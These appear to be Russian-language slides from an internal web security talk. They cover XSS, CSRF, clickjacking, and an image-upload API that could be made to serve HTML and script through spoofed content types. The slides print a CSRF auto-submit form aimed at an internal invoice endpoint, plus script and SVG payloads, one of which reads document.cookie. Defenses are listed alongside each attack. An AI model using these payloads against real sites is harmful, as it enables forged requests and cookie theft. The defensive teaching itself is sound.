Безопасность
Атаки
- XSS
- CSRF
- SQL Injection
- ....
XSS
XSS
// Нельзя:
node.innerHTML = userData;
// Можно
node.textContent = userData;
// или так:
node.innerHTML = sanitize(userData)CSRF
Учет счетов
<form name="attack"
enctype="multipart/form-data"
action="http://orvis-1.kontur:7090/invoice/211529"
method="POST">
<input type="hidden" name='managerId' value='32' />
<input type="hidden" name='InvoiceUpdateInfo.InvoiceActionTypeId' value='1' />
<! -- OTHER PARAMETERS -->
</form>
<script>document.attack.submit();</script>Учет счетов
CSRF
Подвержены атаке:
- Cookie, Basic, NTLM
Решение:
- Antiforgery tokens
- Referer check
- OAuth bearer tokens
Про Стаф Стафф
Топ 3
"Никакой защиты" (с)
- Request throttling
- Captcha
Топ 2
Кликджекинг
X-FRAME-OPTIONS: DENY|SAME-ORIGIN
Топ 1
Images API (XSS)
Images API
POST api/images
{
"imageInfoList": [
{
"filePath": "wKTI6b/myphoto.jpg",
"contentType": "image/jpeg",
"resolution": {
"width": 1024,
"height": 768
}
}
]
}GET api/images/wKTI6b/myphoto.jpg?size=L
Content-Disposition: filename="myphoto.jpg"
Content-Type: image/jpeg
<BLOB>Content-Type: image/jpeg
Images API
POST api/images
{
"imageInfoList": [
{
"filePath": "wKTI6b/myphoto.jpg",
"contentType": "text/html",
"resolution": {
"width": 1024,
"height": 768
}
}
]
}GET api/images/wKTI6b/myphoto.jpg?size=L
Content-Disposition: filename="myphoto.jpg"
Content-Type: text/html
<BLOB>Content-Type: text/html
Images API
POST api/images
Content-Disposition: filename="myphoto.jpg"
Content-Type: text/html
<script>alert(1);</script>
Images API
POST api/images
Content-Disposition: filename="myphoto.png"
Content-Type: text/html
<BLOB>
<script>alert(1);</script>GET https://staff.skbkontur.ru/api/images/wKTI6b/myphoto.png
Content-Type: text/html
Images API
<iframe src="/api/images/wKTI6b/myphoto.png"></iframe>Images API
Allow "image/*"
image/svg+xml
<svg height="100" width="100">
<circle cx="50" cy="50" r="40" fill="red" />
<script>alert(document.cookie)</script>
</svg>Images API
blob.domain.com
content type whitelist